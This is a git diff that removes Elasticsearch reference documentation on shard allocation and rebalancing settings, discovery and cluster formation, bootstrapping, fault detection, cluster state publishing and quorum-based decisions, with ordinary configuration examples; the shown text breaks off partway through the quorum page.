-[[cluster-shard-allocation-settings]]
-==== Cluster-level shard allocation settings
-
-You can use the following settings to control shard allocation and recovery:
-
-[[cluster-routing-allocation-enable]]
-`cluster.routing.allocation.enable`::
-+
---
-(<>)
-Enable or disable allocation for specific kinds of shards:
-
-* `all` - (default) Allows shard allocation for all kinds of shards.
-* `primaries` - Allows shard allocation only for primary shards.
-* `new_primaries` - Allows shard allocation only for primary shards for new indices.
-* `none` - No shard allocations of any kind are allowed for any indices.
-
-This setting does not affect the recovery of local primary shards when
-restarting a node. A restarted node that has a copy of an unassigned primary
-shard will recover that primary immediately, assuming that its allocation id matches
-one of the active allocation ids in the cluster state.
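-
-This setting is commonly updated dynamically, for example to restrict
-allocation to primaries while restarting a node. A minimal sketch (reset the
-setting to `null` afterwards to restore the default):
-
-[source,console]
---------------------------------------------------
-PUT _cluster/settings
-{
-  "persistent": {
-    "cluster.routing.allocation.enable": "primaries"
-  }
-}
---------------------------------------------------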
-
---
-
-`cluster.routing.allocation.node_concurrent_incoming_recoveries`::
- (<>)
- How many concurrent incoming shard recoveries are allowed to happen on a node. Incoming recoveries are the recoveries
- where the target shard (most likely the replica unless a shard is relocating) is allocated on the node. Defaults to `2`.
-
-`cluster.routing.allocation.node_concurrent_outgoing_recoveries`::
- (<>)
- How many concurrent outgoing shard recoveries are allowed to happen on a node. Outgoing recoveries are the recoveries
- where the source shard (most likely the primary unless a shard is relocating) is allocated on the node. Defaults to `2`.
-
-`cluster.routing.allocation.node_concurrent_recoveries`::
- (<>)
- A shortcut to set both `cluster.routing.allocation.node_concurrent_incoming_recoveries` and
- `cluster.routing.allocation.node_concurrent_outgoing_recoveries`.
-
-
-`cluster.routing.allocation.node_initial_primaries_recoveries`::
- (<>)
- While the recovery of replicas happens over the network, the recovery of
- an unassigned primary after node restart uses data from the local disk.
- These should be fast so more initial primary recoveries can happen in
- parallel on the same node. Defaults to `4`.
-
-
-`cluster.routing.allocation.same_shard.host`::
- (<>)
- Performs a check to prevent allocation of multiple instances of
- the same shard on a single host, based on host name and host address.
- Defaults to `false`, meaning that no check is performed by default. This
- setting only applies if multiple nodes are started on the same machine.
-
-[[shards-rebalancing-settings]]
-==== Shard rebalancing settings
-
-A cluster is _balanced_ when it has an equal number of shards on each node
-without having a concentration of shards from any index on any node. {es} runs
-an automatic process called _rebalancing_ which moves shards between the nodes
-in your cluster to improve its balance. Rebalancing obeys all other shard
-allocation rules such as <> and <> which may prevent it from
-completely balancing the cluster. In that case, rebalancing strives to achieve
-the most balanced cluster possible within the rules you have configured. If you
-are using <> then {es} automatically applies allocation
-filtering rules to place each shard within the appropriate tier. These rules
-mean that the balancer works independently within each tier.
-
-You can use the following settings to control the rebalancing of shards across
-the cluster:
-
-`cluster.routing.rebalance.enable`::
-+
---
-(<>)
-Enable or disable rebalancing for specific kinds of shards:
-
-* `all` - (default) Allows shard balancing for all kinds of shards.
-* `primaries` - Allows shard balancing only for primary shards.
-* `replicas` - Allows shard balancing only for replica shards.
-* `none` - No shard balancing of any kind is allowed for any indices.
---
-
-
-`cluster.routing.allocation.allow_rebalance`::
-+
---
-(<>)
-Specify when shard rebalancing is allowed:
-
-
-* `always` - Always allow rebalancing.
-* `indices_primaries_active` - Only when all primaries in the cluster are allocated.
-* `indices_all_active` - (default) Only when all shards (primaries and replicas) in the cluster are allocated.
---
-
-`cluster.routing.allocation.cluster_concurrent_rebalance`::
- (<>)
- Controls how many concurrent shard rebalances are
- allowed cluster wide. Defaults to `2`. Note that this setting
- only controls the number of concurrent shard relocations due
- to imbalances in the cluster.
This setting does not limit shard - relocations due to <> or <>. - -[[shards-rebalancing-heuristics]] -==== Shard balancing heuristics settings - -Rebalancing works by computing a _weight_ for each node based on its allocation -of shards, and then moving shards between nodes to reduce the weight of the -heavier nodes and increase the weight of the lighter ones. The cluster is -balanced when there is no possible shard movement that can bring the weight of -any node closer to the weight of any other node by more than a configurable -threshold. The following settings allow you to control the details of these -calculations. - -`cluster.routing.allocation.balance.shard`:: - (<>) - Defines the weight factor for the total number of shards allocated on a node - (float). Defaults to `0.45f`. Raising this raises the tendency to - equalize the number of shards across all nodes in the cluster. - -`cluster.routing.allocation.balance.index`:: - (<>) - Defines the weight factor for the number of shards per index allocated - on a specific node (float). Defaults to `0.55f`. Raising this raises the - tendency to equalize the number of shards per index across all nodes in - the cluster. - -`cluster.routing.allocation.balance.threshold`:: - (<>) - Minimal optimization value of operations that should be performed (non - negative float). Defaults to `1.0f`. Raising this will cause the cluster - to be less aggressive about optimizing the shard balance. - - -NOTE: Regardless of the result of the balancing algorithm, rebalancing might -not be allowed due to forced awareness or allocation filtering. diff --git a/docs/reference/modules/discovery.asciidoc b/docs/reference/modules/discovery.asciidoc deleted file mode 100644 index 0fb42cc7edf..00000000000 --- a/docs/reference/modules/discovery.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[[modules-discovery]] -== Discovery and cluster formation - -The discovery and cluster formation processes are responsible for discovering -nodes, electing a master, forming a cluster, and publishing the cluster state -each time it changes. All communication between nodes is done using the -<> layer. - -The following processes and settings are part of discovery and cluster -formation: - -<>:: - - Discovery is the process where nodes find each other when the master is - unknown, such as when a node has just started up or when the previous - master has failed. - -<>:: - - How {es} uses a quorum-based voting mechanism to - make decisions even if some nodes are unavailable. - -<>:: - - How {es} automatically updates voting configurations as nodes leave and join - a cluster. - -<>:: - - Bootstrapping a cluster is required when an {es} cluster starts up - for the very first time. In <>, with no - discovery settings configured, this is automatically performed by the nodes - themselves. As this auto-bootstrapping is - <>, running a node in - <> requires bootstrapping to be - explicitly configured via the - <>. - -<>:: - - It is recommended to have a small and fixed number of master-eligible nodes - in a cluster, and to scale the cluster up and down by adding and removing - master-ineligible nodes only. However there are situations in which it may - be desirable to add or remove some master-eligible nodes to or from a - cluster. This section describes the process for adding or removing - master-eligible nodes, including the extra steps that need to be performed - when removing more than half of the master-eligible nodes at the same time. 
- -<>:: - - Cluster state publishing is the process by which the elected master node - updates the cluster state on all the other nodes in the cluster. - -<>:: - - {es} performs health checks to detect and remove faulty nodes. - -<>:: - - There are settings that enable users to influence the discovery, cluster - formation, master election and fault detection processes. - -include::discovery/discovery.asciidoc[] - -include::discovery/quorums.asciidoc[] - -include::discovery/voting.asciidoc[] - -include::discovery/bootstrapping.asciidoc[] - -include::discovery/publishing.asciidoc[] - -include::discovery/fault-detection.asciidoc[] diff --git a/docs/reference/modules/discovery/bootstrapping.asciidoc b/docs/reference/modules/discovery/bootstrapping.asciidoc deleted file mode 100644 index d459bdb9204..00000000000 --- a/docs/reference/modules/discovery/bootstrapping.asciidoc +++ /dev/null @@ -1,147 +0,0 @@ -[[modules-discovery-bootstrap-cluster]] -=== Bootstrapping a cluster - -Starting an Elasticsearch cluster for the very first time requires the initial -set of <> to be explicitly defined on one or -more of the master-eligible nodes in the cluster. This is known as _cluster -bootstrapping_. This is only required the first time a cluster starts up: nodes -that have already joined a cluster store this information in their data folder -for use in a <>, and freshly-started nodes -that are joining a running cluster obtain this information from the cluster's -elected master. - -The initial set of master-eligible nodes is defined in the -<>. This should be -set to a list containing one of the following items for each master-eligible -node: - -- The <> of the node. -- The node's hostname if `node.name` is not set, because `node.name` defaults - to the node's hostname. You must use either the fully-qualified hostname or - the bare hostname <>. -- The IP address of the node's <>, if it is - not possible to use the `node.name` of the node. This is normally the IP - address to which <> resolves but - <>. -- The IP address and port of the node's publish address, in the form `IP:PORT`, - if it is not possible to use the `node.name` of the node and there are - multiple nodes sharing a single IP address. - -When you start a master-eligible node, you can provide this setting on the -command line or in the `elasticsearch.yml` file. After the cluster has formed, -this setting is no longer required. It should not be set for master-ineligible -nodes, master-eligible nodes joining an existing cluster, or cluster restarts. - -It is technically sufficient to set `cluster.initial_master_nodes` on a single -master-eligible node in the cluster, and only to mention that single node in the -setting's value, but this provides no fault tolerance before the cluster has -fully formed. It is therefore better to bootstrap using at least three -master-eligible nodes, each with a `cluster.initial_master_nodes` setting -containing all three nodes. - -WARNING: You must set `cluster.initial_master_nodes` to the same list of nodes -on each node on which it is set in order to be sure that only a single cluster -forms during bootstrapping and therefore to avoid the risk of data loss. 
-
-For a cluster with 3 master-eligible nodes (with <>
-`master-a`, `master-b` and `master-c`) the configuration will look as follows:
-
-[source,yaml]
--------------------------------------------------
-cluster.initial_master_nodes:
-  - master-a
-  - master-b
-  - master-c
--------------------------------------------------
-
-Like all node settings, it is also possible to specify the initial set of master
-nodes on the command-line that is used to start Elasticsearch:
-
-[source,bash]
--------------------------------------------------
-$ bin/elasticsearch -Ecluster.initial_master_nodes=master-a,master-b,master-c
--------------------------------------------------
-
-[NOTE]
-==================================================
-
-[[modules-discovery-bootstrap-cluster-fqdns]] The node names used in the
-`cluster.initial_master_nodes` list must exactly match the `node.name`
-properties of the nodes. By default the node name is set to the machine's
-hostname which may or may not be fully-qualified depending on your system
-configuration. If each node name is a fully-qualified domain name such as
-`master-a.example.com` then you must use fully-qualified domain names in the
-`cluster.initial_master_nodes` list too; conversely if your node names are bare
-hostnames (without the `.example.com` suffix) then you must use bare hostnames
-in the `cluster.initial_master_nodes` list. If you use a mix of fully-qualified
-and bare hostnames, or there is some other mismatch between `node.name` and
-`cluster.initial_master_nodes`, then the cluster will not form successfully and
-you will see log messages like the following.
-
-[source,text]
--------------------------------------------------
-[master-a.example.com] master not discovered yet, this node has
-not previously joined a bootstrapped (v7+) cluster, and this
-node must discover master-eligible nodes [master-a, master-b] to
-bootstrap a cluster: have discovered [{master-b.example.com}{...
--------------------------------------------------
-
-This message shows the node names `master-a.example.com` and
-`master-b.example.com` as well as the `cluster.initial_master_nodes` entries
-`master-a` and `master-b`, and it is clear from this message that they do not
-match exactly.
-
-==================================================
-
-[discrete]
-==== Choosing a cluster name
-
-The <> setting enables you to create multiple
-clusters which are separated from each other. Nodes verify that they agree on
-their cluster name when they first connect to each other, and Elasticsearch
-will only form a cluster from nodes that all have the same cluster name. The
-default value for the cluster name is `elasticsearch`, but it is recommended to
-change this to reflect the logical name of the cluster.
-
-[discrete]
-==== Auto-bootstrapping in development mode
-
-If the cluster is running with a completely default configuration then it will
-automatically bootstrap a cluster based on the nodes that could be discovered to
-be running on the same host within a short time after startup. This means that
-by default it is possible to start up several nodes on a single machine and have
-them automatically form a cluster, which is very useful for development
-environments and experimentation. However, since nodes may not always
-successfully discover each other quickly enough, this automatic bootstrapping
-cannot be relied upon and cannot be used in production deployments.
- -If any of the following settings are configured then auto-bootstrapping will not -take place, and you must configure `cluster.initial_master_nodes` as described -in the <>: - -* `discovery.seed_providers` -* `discovery.seed_hosts` -* `cluster.initial_master_nodes` - -[NOTE] -================================================== - -[[modules-discovery-bootstrap-cluster-joining]] If you start an {es} node -without configuring these settings then it will start up in development mode and -auto-bootstrap itself into a new cluster. If you start some {es} nodes on -different hosts then by default they will not discover each other and will form -a different cluster on each host. {es} will not merge separate clusters together -after they have formed, even if you subsequently try and configure all the nodes -into a single cluster. This is because there is no way to merge these separate -clusters together without a risk of data loss. You can tell that you have formed -separate clusters by checking the cluster UUID reported by `GET /` on each node. -If you intended to form a single cluster then you should start again: - -* Shut down all the nodes. -* Completely wipe each node by deleting the contents of their - <>. -* Configure `cluster.initial_master_nodes` as described above. -* Restart all the nodes and verify that they have formed a single cluster. - -================================================== diff --git a/docs/reference/modules/discovery/discovery-settings.asciidoc b/docs/reference/modules/discovery/discovery-settings.asciidoc deleted file mode 100644 index 7659262db5e..00000000000 --- a/docs/reference/modules/discovery/discovery-settings.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[[modules-discovery-settings]] -=== Discovery and cluster formation settings - -<> are affected by the -following settings: - -`discovery.seed_hosts`:: -+ --- -(<>) -Provides a list of the addresses of the master-eligible nodes in the cluster. -May also be a single string containing the addresses separated by commas. Each -address has the format `host:port` or `host`. The `host` is either a host name -to be resolved by DNS, an IPv4 address, or an IPv6 address. IPv6 addresses -must be enclosed in square brackets. If a host name resolves via DNS to multiple -addresses, {es} uses all of them. DNS lookups are subject to -<>. If the `port` is not given then it -is determined by checking the following settings in order: - -. `transport.profiles.default.port` -. `transport.port` - -If neither of these is set then the default port is `9300`. The default value -for `discovery.seed_hosts` is `["127.0.0.1", "[::1]"]`. See <>. - -This setting was previously known as `discovery.zen.ping.unicast.hosts`. Its -old name is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future version. --- - -`discovery.seed_providers`:: -(<>) -Specifies which types of <> to -use to obtain the addresses of the seed nodes used to start the discovery -process. By default, it is the -<> which -obtains the seed node addresses from the `discovery.seed_hosts` setting. -This setting was previously known as `discovery.zen.hosts_provider`. Its old -name is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future version. - -`discovery.type`:: -(<>) -Specifies whether {es} should form a multiple-node cluster. 
By default, {es} -discovers other nodes when forming a cluster and allows other nodes to join -the cluster later. If `discovery.type` is set to `single-node`, {es} forms a -single-node cluster and suppresses the timeout set by -`cluster.publish.timeout`. For more information about when you might use -this setting, see <>. - -`cluster.initial_master_nodes`:: -(<>) -Sets the initial set of master-eligible nodes in a brand-new cluster. By default -this list is empty, meaning that this node expects to join a cluster that has -already been bootstrapped. See <>. - -[discrete] -==== Expert settings - -Discovery and cluster formation are also affected by the following -_expert-level_ settings, although it is not recommended to change any of these -from their default values. - -WARNING: If you adjust these settings then your cluster may not form correctly -or may become unstable or intolerant of certain failures. - -`discovery.cluster_formation_warning_timeout`:: -(<>) -Sets how long a node will try to form a cluster before logging a warning that -the cluster did not form. Defaults to `10s`. If a cluster has not formed after -`discovery.cluster_formation_warning_timeout` has elapsed then the node will log -a warning message that starts with the phrase `master not discovered` which -describes the current state of the discovery process. - -`discovery.find_peers_interval`:: -(<>) -Sets how long a node will wait before attempting another discovery round. -Defaults to `1s`. - -`discovery.probe.connect_timeout`:: -(<>) -Sets how long to wait when attempting to connect to each address. Defaults to -`3s`. - -`discovery.probe.handshake_timeout`:: -(<>) -Sets how long to wait when attempting to identify the remote node via a -handshake. Defaults to `1s`. - -`discovery.request_peers_timeout`:: -(<>) -Sets how long a node will wait after asking its peers again before considering -the request to have failed. Defaults to `3s`. - -`discovery.seed_resolver.max_concurrent_resolvers`:: -(<>) -Specifies how many concurrent DNS lookups to perform when resolving the -addresses of seed nodes. Defaults to `10`. This setting was previously -known as `discovery.zen.ping.unicast.concurrent_connects`. Its old name is -deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future -version. - -`discovery.seed_resolver.timeout`:: -(<>) -Specifies how long to wait for each DNS lookup performed when resolving the -addresses of seed nodes. Defaults to `5s`. This setting was previously -known as `discovery.zen.ping.unicast.hosts.resolve_timeout`. Its old name -is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future -version. - -`cluster.auto_shrink_voting_configuration`:: -(<>) -Controls whether the <> sheds -departed nodes automatically, as long as it still contains at least 3 nodes. The -default value is `true`. If set to `false`, the voting configuration never -shrinks automatically and you must remove departed nodes manually with the -<>. - -[[master-election-settings]]`cluster.election.back_off_time`:: -(<>) -Sets the amount to increase the upper bound on the wait before an election on -each election failure. Note that this is _linear_ backoff. This defaults to -`100ms`. Changing this setting from the default may cause your cluster to fail -to elect a master node. 
-
-`cluster.election.duration`::
-(<>)
-Sets how long each election is allowed to take before a node considers it to
-have failed and schedules a retry. This defaults to `500ms`. Changing this
-setting from the default may cause your cluster to fail to elect a master node.
-
-`cluster.election.initial_timeout`::
-(<>)
-Sets the upper bound on how long a node will wait initially, or after the
-elected master fails, before attempting its first election. This defaults to
-`100ms`. Changing this setting from the default may cause your cluster to fail
-to elect a master node.
-
-`cluster.election.max_timeout`::
-(<>)
-Sets the maximum upper bound on how long a node will wait before attempting a
-first election, so that a network partition that lasts for a long time does not
-result in excessively sparse elections. This defaults to `10s`. Changing this
-setting from the default may cause your cluster to fail to elect a master node.
-
-[[fault-detection-settings]]`cluster.fault_detection.follower_check.interval`::
-(<>)
-Sets how long the elected master waits between follower checks to each other
-node in the cluster. Defaults to `1s`. Changing this setting from the default
-may cause your cluster to become unstable.
-
-`cluster.fault_detection.follower_check.timeout`::
-(<>)
-Sets how long the elected master waits for a response to a follower check before
-considering it to have failed. Defaults to `10s`. Changing this setting from the
-default may cause your cluster to become unstable.
-
-`cluster.fault_detection.follower_check.retry_count`::
-(<>)
-Sets how many consecutive follower check failures must occur to each node before
-the elected master considers that node to be faulty and removes it from the
-cluster. Defaults to `3`. Changing this setting from the default may cause your
-cluster to become unstable.
-
-`cluster.fault_detection.leader_check.interval`::
-(<>)
-Sets how long each node waits between checks of the elected master. Defaults to
-`1s`. Changing this setting from the default may cause your cluster to become
-unstable.
-
-`cluster.fault_detection.leader_check.timeout`::
-(<>)
-Sets how long each node waits for a response to a leader check from the elected
-master before considering it to have failed. Defaults to `10s`. Changing this
-setting from the default may cause your cluster to become unstable.
-
-`cluster.fault_detection.leader_check.retry_count`::
-(<>)
-Sets how many consecutive leader check failures must occur before a node
-considers the elected master to be faulty and attempts to find or elect a new
-master. Defaults to `3`. Changing this setting from the default may cause your
-cluster to become unstable.
-
-`cluster.follower_lag.timeout`::
-(<>)
-Sets how long the master node waits to receive acknowledgements for cluster
-state updates from lagging nodes. The default value is `90s`. If a node does not
-successfully apply the cluster state update within this period of time, it is
-considered to have failed and is removed from the cluster. See
-<>.
-
-`cluster.join.timeout`::
-(<>)
-deprecated[7.10, Has no effect in 7.x clusters] Sets how long a node will
-wait after sending a request to join a version 6.8 master before it
-considers the request to have failed and retries. Defaults to `60s`.
-
-`cluster.max_voting_config_exclusions`::
-(<>)
-Sets a limit on the number of voting configuration exclusions at any one time.
-The default value is `10`. See <>.
-
-`cluster.publish.info_timeout`::
-(<>)
-Sets how long the master node waits for each cluster state update to be
-completely published to all nodes before logging a message indicating that some
-nodes are responding slowly. The default value is `10s`.
-
-`cluster.publish.timeout`::
-(<>)
-Sets how long the master node waits for each cluster state update to be
-completely published to all nodes, unless `discovery.type` is set to
-`single-node`. The default value is `30s`. See <>.
-
-[[no-master-block]]
-`cluster.no_master_block`::
-(<>)
-Specifies which operations are rejected when there is no active master in a
-cluster. This setting has three valid values:
-+
---
-`all`::: All operations on the node (both read and write operations) are rejected.
-This also applies for API cluster state read or write operations, like the get
-index settings, put mapping and cluster state API.
-
-`write`::: (default) Write operations are rejected. Read operations succeed,
-based on the last known cluster configuration. This situation may result in
-partial reads of stale data as this node may be isolated from the rest of the
-cluster.
-
-`metadata_write`::: Only metadata write operations (e.g. mapping updates,
-routing table changes) are rejected but regular indexing operations continue
-to work. Read and write operations succeed, based on the last known cluster
-configuration. This situation may result in partial reads of stale data as
-this node may be isolated from the rest of the cluster.
-
-[NOTE]
-===============================
-* The `cluster.no_master_block` setting doesn't apply to nodes-based APIs
-(for example, cluster stats, node info, and node stats APIs). Requests to these
-APIs are not blocked and can run on any available node.
-
-* For the cluster to be fully operational, it must have an active master.
-===============================
-
-WARNING: This setting replaces the `discovery.zen.no_master_block` setting in
-earlier versions. The `discovery.zen.no_master_block` setting is ignored.
-
---
-
-`monitor.fs.health.enabled`::
-(<>)
-If `true`, the node runs periodic
-<>. Defaults
-to `true`.
-
-`monitor.fs.health.refresh_interval`::
-(<>)
-Interval between successive
-<>. Defaults
-to `2m`.
-
-`monitor.fs.health.slow_path_logging_threshold`::
-(<>)
-If a <>
-takes longer than this threshold then {es} logs a warning. Defaults to `5s`.
diff --git a/docs/reference/modules/discovery/discovery.asciidoc b/docs/reference/modules/discovery/discovery.asciidoc
deleted file mode 100644
index 0c5057486de..00000000000
--- a/docs/reference/modules/discovery/discovery.asciidoc
+++ /dev/null
@@ -1,155 +0,0 @@
-[[modules-discovery-hosts-providers]]
-=== Discovery
-
-Discovery is the process by which the cluster formation module finds other
-nodes with which to form a cluster. This process runs when you start an
-Elasticsearch node or when a node believes the master node failed and continues
-until the master node is found or a new master node is elected.
-
-This process starts with a list of _seed_ addresses from one or more
-<>, together with the addresses
-of any master-eligible nodes that were in the last-known cluster. The process
-operates in two phases: First, each node probes the seed addresses by
-connecting to each address and attempting to identify the node to which it is
-connected and to verify that it is master-eligible. Secondly, if successful, it
-shares with the remote node a list of all of its known master-eligible peers
-and the remote node responds with _its_ peers in turn.
The node then probes all -the new nodes that it just discovered, requests their peers, and so on. - -If the node is not master-eligible then it continues this discovery process -until it has discovered an elected master node. If no elected master is -discovered then the node will retry after `discovery.find_peers_interval` which -defaults to `1s`. - -If the node is master-eligible then it continues this discovery process until -it has either discovered an elected master node or else it has discovered -enough masterless master-eligible nodes to complete an election. If neither of -these occur quickly enough then the node will retry after -`discovery.find_peers_interval` which defaults to `1s`. - -[[built-in-hosts-providers]] -==== Seed hosts providers - -By default the cluster formation module offers two seed hosts providers to -configure the list of seed nodes: a _settings_-based and a _file_-based seed -hosts provider. It can be extended to support cloud environments and other -forms of seed hosts providers via {plugins}/discovery.html[discovery plugins]. -Seed hosts providers are configured using the `discovery.seed_providers` -setting, which defaults to the _settings_-based hosts provider. This setting -accepts a list of different providers, allowing you to make use of multiple -ways to find the seed hosts for your cluster. - -Each seed hosts provider yields the IP addresses or hostnames of the seed -nodes. If it returns any hostnames then these are resolved to IP addresses -using a DNS lookup. If a hostname resolves to multiple IP addresses then {es} -tries to find a seed node at all of these addresses. If the hosts provider does -not explicitly give the TCP port of the node by then, it will implicitly use the -first port in the port range given by `transport.profiles.default.port`, or by -`transport.port` if `transport.profiles.default.port` is not set. The number of -concurrent lookups is controlled by -`discovery.seed_resolver.max_concurrent_resolvers` which defaults to `10`, and -the timeout for each lookup is controlled by `discovery.seed_resolver.timeout` -which defaults to `5s`. Note that DNS lookups are subject to -<>. - -[discrete] -[[settings-based-hosts-provider]] -===== Settings-based seed hosts provider - -The settings-based seed hosts provider uses a node setting to configure a -static list of the addresses of the seed nodes. These addresses can be given as -hostnames or IP addresses; hosts specified as hostnames are resolved to IP -addresses during each round of discovery. - -The list of hosts is set using the <> -static setting. For example: - -[source,yaml] --------------------------------------------------- -discovery.seed_hosts: - - 192.168.1.10:9300 - - 192.168.1.11 <1> - - seeds.mydomain.com <2> --------------------------------------------------- -<1> The port will default to `transport.profiles.default.port` and fallback to - `transport.port` if not specified. -<2> If a hostname resolves to multiple IP addresses, {es} will attempt to - connect to every resolved address. - -[discrete] -[[file-based-hosts-provider]] -===== File-based seed hosts provider - -The file-based seed hosts provider configures a list of hosts via an external -file. {es} reloads this file when it changes, so that the list of seed nodes -can change dynamically without needing to restart each node. 
For example, this
-gives a convenient mechanism for an {es} instance that is run in a Docker
-container to be dynamically supplied with a list of IP addresses to connect to
-when those IP addresses may not be known at node startup.
-
-To enable file-based discovery, configure the `file` hosts provider as follows
-in the `elasticsearch.yml` file:
-
-[source,yml]
----------------------------------------------------------------
-discovery.seed_providers: file
----------------------------------------------------------------
-
-Then create a file at `$ES_PATH_CONF/unicast_hosts.txt` in the format described
-below. Any time a change is made to the `unicast_hosts.txt` file the new
-changes will be picked up by {es} and the new hosts list will be used.
-
-Note that the file-based discovery plugin augments the unicast hosts list in
-`elasticsearch.yml`: if there are valid seed addresses in
-`discovery.seed_hosts` then {es} uses those addresses in addition to those
-supplied in `unicast_hosts.txt`.
-
-The `unicast_hosts.txt` file contains one node entry per line. Each node entry
-consists of the host (host name or IP address) and an optional transport port
-number. If the port number is specified, it must come immediately after the
-host (on the same line) separated by a `:`. If the port number is not
-specified, {es} will implicitly use the first port in the port range given by
-`transport.profiles.default.port`, or by `transport.port` if
-`transport.profiles.default.port` is not set.
-
-For example, here is a `unicast_hosts.txt` file for a cluster with four
-nodes that participate in discovery, some of which are not running on the
-default port:
-
-[source,txt]
----------------------------------------------------------------
-10.10.10.5
-10.10.10.6:9305
-10.10.10.5:10005
-# an IPv6 address
-[2001:0db8:85a3:0000:0000:8a2e:0370:7334]:9301
----------------------------------------------------------------
-
-Host names are allowed instead of IP addresses and are resolved by DNS as
-described above. IPv6 addresses must be given in brackets with the port, if
-needed, coming after the brackets.
-
-You can also add comments to this file. All comments must appear on their own
-lines, starting with `#` (i.e. comments cannot start in the middle of a line).
-
-[discrete]
-[[ec2-hosts-provider]]
-===== EC2 hosts provider
-
-The {plugins}/discovery-ec2.html[EC2 discovery plugin] adds a hosts provider
-that uses the https://github.com/aws/aws-sdk-java[AWS API] to find a list of
-seed nodes.
-
-[discrete]
-[[azure-classic-hosts-provider]]
-===== Azure Classic hosts provider
-
-The {plugins}/discovery-azure-classic.html[Azure Classic discovery plugin] adds
-a hosts provider that uses the Azure Classic API to find a list of seed nodes.
-
-[discrete]
-[[gce-hosts-provider]]
-===== Google Compute Engine hosts provider
-
-The {plugins}/discovery-gce.html[GCE discovery plugin] adds a hosts provider
-that uses the GCE API to find a list of seed nodes.
diff --git a/docs/reference/modules/discovery/fault-detection.asciidoc b/docs/reference/modules/discovery/fault-detection.asciidoc
deleted file mode 100644
index 56b5bc32a75..00000000000
--- a/docs/reference/modules/discovery/fault-detection.asciidoc
+++ /dev/null
@@ -1,27 +0,0 @@
-[[cluster-fault-detection]]
-=== Cluster fault detection
-
-The elected master periodically checks each of the nodes in the cluster to
-ensure that they are still connected and healthy. Each node in the cluster also
-periodically checks the health of the elected master.
These checks are known -respectively as _follower checks_ and _leader checks_. - -Elasticsearch allows these checks to occasionally fail or timeout without -taking any action. It considers a node to be faulty only after a number of -consecutive checks have failed. You can control fault detection behavior with -<>. - -If the elected master detects that a node has disconnected, however, this -situation is treated as an immediate failure. The master bypasses the timeout -and retry setting values and attempts to remove the node from the cluster. -Similarly, if a node detects that the elected master has disconnected, this -situation is treated as an immediate failure. The node bypasses the timeout and -retry settings and restarts its discovery phase to try and find or elect a new -master. - -[[cluster-fault-detection-filesystem-health]] -Additionally, each node periodically verifies that its data path is healthy by -writing a small file to disk and then deleting it again. If a node discovers -its data path is unhealthy then it is removed from the cluster until the data -path recovers. You can control this behavior with the -<>. diff --git a/docs/reference/modules/discovery/publishing.asciidoc b/docs/reference/modules/discovery/publishing.asciidoc deleted file mode 100644 index 8452f0cd04f..00000000000 --- a/docs/reference/modules/discovery/publishing.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[cluster-state-publishing]] -=== Publishing the cluster state - -The master node is the only node in a cluster that can make changes to the -cluster state. The master node processes one batch of cluster state updates at -a time, computing the required changes and publishing the updated cluster state -to all the other nodes in the cluster. Each publication starts with the master -broadcasting the updated cluster state to all nodes in the cluster. Each node -responds with an acknowledgement but does not yet apply the newly-received -state. Once the master has collected acknowledgements from enough -master-eligible nodes, the new cluster state is said to be _committed_ and the -master broadcasts another message instructing nodes to apply the now-committed -state. Each node receives this message, applies the updated state, and then -sends a second acknowledgement back to the master. - -The master allows a limited amount of time for each cluster state update to be -completely published to all nodes. It is defined by the -`cluster.publish.timeout` setting, which defaults to `30s`, measured from the -time the publication started. If this time is reached before the new cluster -state is committed then the cluster state change is rejected and the master -considers itself to have failed. It stands down and starts trying to elect a -new master. - -If the new cluster state is committed before `cluster.publish.timeout` has -elapsed, the master node considers the change to have succeeded. It waits until -the timeout has elapsed or until it has received acknowledgements that each -node in the cluster has applied the updated state, and then starts processing -and publishing the next cluster state update. If some acknowledgements have not -been received (i.e. some nodes have not yet confirmed that they have applied -the current update), these nodes are said to be _lagging_ since their cluster -states have fallen behind the master's latest state. The master waits for the -lagging nodes to catch up for a further time, `cluster.follower_lag.timeout`, -which defaults to `90s`. 
If a node has still not successfully applied the -cluster state update within this time then it is considered to have failed and -is removed from the cluster. - -Cluster state updates are typically published as diffs to the previous cluster -state, which reduces the time and network bandwidth needed to publish a cluster -state update. For example, when updating the mappings for only a subset of the -indices in the cluster state, only the updates for those indices need to be -published to the nodes in the cluster, as long as those nodes have the previous -cluster state. If a node is missing the previous cluster state, for example -when rejoining a cluster, the master will publish the full cluster state to -that node so that it can receive future updates as diffs. - -NOTE: {es} is a peer to peer based system, in which nodes communicate with one -another directly. The high-throughput APIs (index, delete, search) do not -normally interact with the master node. The responsibility of the master node -is to maintain the global cluster state and reassign shards when nodes join or -leave the cluster. Each time the cluster state is changed, the new state is -published to all nodes in the cluster as described above. diff --git a/docs/reference/modules/discovery/quorums.asciidoc b/docs/reference/modules/discovery/quorums.asciidoc deleted file mode 100644 index 5cf9438544c..00000000000 --- a/docs/reference/modules/discovery/quorums.asciidoc +++ /dev/null @@ -1,66 +0,0 @@ -[[modules-discovery-quorums]] -=== Quorum-based decision making - -Electing a master node and changing the cluster state are the two fundamental -tasks that master-eligible nodes must work together to perform. It is important -that these activities work robustly even if some nodes have failed. -Elasticsearch achieves this robustness by considering each action to have -succeeded on receipt of responses from a _quorum_, which is a subset of the -master-eligible nodes in the cluster. The advantage of requiring only a subset -of the nodes to respond is that it means some of the nodes can fail without -preventing the cluster from making progress. The quorums are carefully chosen so -the cluster does not have a "split brain" scenario where it's partitioned into -two pieces such that each piece may make decisions that are inconsistent with -those of the other piece. - -Elasticsearch allows you to add and remove master-eligible nodes to a running -cluster. In many cases you can do this simply by starting or stopping the nodes -as required. See <>. - -As nodes are added or removed Elasticsearch maintains an optimal level of fault -tolerance by updating the cluster's <>, which is the set of master-eligible nodes whose responses are -counted when making decisions such as electing a new master or committing a new -cluster state. A decision is made only after more than half of the nodes in the -voting configuration have responded. Usually the voting configuration is the -same as the set of all the master-eligible nodes that are currently in the -cluster. However, there are some situations in which they may be different. - -To be sure that the cluster remains available you **must not stop half or more -of the nodes in the voting configuration at the same time**. As long as more -than half of the voting nodes are available the cluster can still work normally. -This means that if there are three or four master-eligible nodes, the cluster -can tolerate one of them being unavailable. 
